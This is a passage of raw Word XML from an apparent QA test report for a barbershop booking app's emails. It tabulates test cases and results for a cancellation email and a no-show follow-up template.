              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00891BE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701483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19A5D85" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="571CA10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BCN-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0059E25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134D96FA"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="22A5A71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3 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="48084DB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7FFA193" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A026A5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BCN-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="69B6803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1960D56C"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32E8448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10 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="139A0D5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B82C9AA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="44E6306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BCN-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4DDB115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68352C7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says “Cancelled”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5AF7C6B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6E8F537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21A4C07" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="337F3DE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BCN-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3377654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0675D0E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detail table includes booking reference row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70DCF66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67E5B33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6D3169C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="75E3A81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BCN-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="39B39A6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3A3614A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displays </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BB-XXXXXXXX</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="47C2A12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10AD639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1A2D6AA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B174EB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BCN-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5832A4F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29F0125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includes “BOOK AGAIN” CTA button</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="79FD6A2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09DF2BE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B269D8D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6F120AA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BCN-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="222E984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094DB3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CTA button URL uses shop booking page slug</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="19ABD89B"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crown-cuts</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="70A1682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479889D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1377195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BCN-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B1406D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2A56E64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Plain text contains </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>BOOKING CANCELLED</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="62CC336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4EDC4CC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56927B7" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="757ADC9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BCN-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="056D093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43062DC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Plain text includes booking reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5F1840F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4080B9E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03744BB" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E256BE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BCN-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CAA31C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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7844482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delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E8FF39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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2077c6ee</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23813E1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bl>
    <w:p w14:paraId="53548E01"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Booking Cancelled — Crown Cuts Barbershop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD88E8F" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1B9E28C1">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1E7C1" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="tc-nsf-no-show-follow-up"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-NSF — No-Show Follow-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2084AEDB"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Template ready for triggering after a no-show event. Not yet wired to an automated trigger — available for manual or future </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> use.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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="110D8BC1"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1D34D5F0"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lastRenderedPageBreak/>
              <w:t>TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="0F000B84"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="0FC68AB1"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4EC36392"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="38CFA584"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3343BF8D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4FB7139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NSF-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3D76CB8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116B3E82"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subject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is a non-empty string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5A49BEB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5A275DB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611A0EC" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49185E4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NSF-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46E5FD1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002B751D"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html</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> field is &gt; 100 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E38828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2548 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78F40FD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EC9B02D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2D575F8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NSF-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0BF8265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49E4AEB4"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text</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> fallback field present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="650EFEF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389 chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0B581FD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B5EA9FC" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A7895F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NSF-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F1E535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796F067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&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="335709E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D2479B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72CEEC2" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="29AC2B7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NSF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4D0B9AD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51400F8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BARBERBOOST</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> branding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="21A1B88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54316CE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5B2BFAE" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="61D04B7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NSF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EEBD68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089262D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uses </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> gold </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>colour</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72E5E15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7802924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0A79D82" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="057042D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NSF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EC1EB2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30673353"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&lt;div&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0228D02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3 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="72C6D35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1AE6D56" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4952656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NSF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7909372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71967E81"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&lt;td&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> tags balanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35800DE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4 pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CA143B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D92925D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
